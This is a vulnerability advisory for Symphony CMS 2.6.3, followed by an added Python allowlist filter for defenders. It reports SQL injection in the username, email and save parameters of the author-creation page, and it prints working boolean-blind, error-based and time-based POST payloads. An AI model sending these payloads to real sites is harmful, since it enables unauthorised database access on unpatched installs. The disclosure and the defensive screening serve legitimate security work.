================================================================
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
================================================================

Information
================================================================
Vulnerability Type: Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://ift.tt/1bgFZfB
Vulnerable Version: Symphony CMS 2.6.3
Fixed Version: Symphony CMS 2.6.5
Severity: High
Author: Sachin Wagh (@tiger_tigerboy)

Description
================================================================
The vulnerabilities are located in the 'fields[username]', 'action[save]' and 'fields[email]' parameters of the '/symphony/system/authors/new/' page.

Proof of Concept
================================================================
*1. fields[username] (POST)*

Parameter: fields[username] (POST)

    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697' OR 7462=7462#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123' OR SLEEP(5)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author
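
For defenders, the following added example (not part of the advisory and not Symphony's own code) screens a POST body sent to '/symphony/system/authors/new/' by checking the three parameters named in the description against strict allowlists. The allowlist patterns, the function names and the sample e-mail address are assumptions chosen for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumed allowlists (not Symphony's own validation rules); tune to local policy.
CHECKS = {
    "fields[username]": re.compile(r"[A-Za-z0-9._-]{1,64}"),
    "fields[email]": re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}"),
    "action[save]": re.compile(r"[A-Za-z ]{1,40}"),
}


def rejected_fields(body):
    """Return the advisory's parameters whose values fail the allowlist."""
    form = parse_qs(body, keep_blank_values=True)
    bad = []
    for name, pattern in CHECKS.items():
        values = form.get(name, [""])
        # A repeated parameter is rejected too: it is ambiguous which copy
        # the application will read, so the check could be bypassed.
        if len(values) != 1 or not pattern.fullmatch(values[0]):
            bad.append(name)
    return bad


def sample_body(username):
    """Build a constructed, URL-encoded body shaped like the form in the advisory."""
    return urlencode({
        "fields[first_name]": "sachin",
        "fields[last_name]": "sachin",
        "fields[email]": "author@example.com",  # constructed sample value
        "fields[username]": username,
        "fields[user_type]": "author",
        "action[save]": "Create Author",
    })


if __name__ == "__main__":
    # Username values below are taken from the advisory's proof of concept.
    for value in ("sachin123", "-6697' OR 7462=7462#", "sachin123' OR SLEEP(5)#"):
        print(repr(value), "->", rejected_fields(sample_body(value)))
```

Screening like this is a layer in front of the application, not a replacement for the vendor fix; the advisory lists Symphony CMS 2.6.5 as the fixed version.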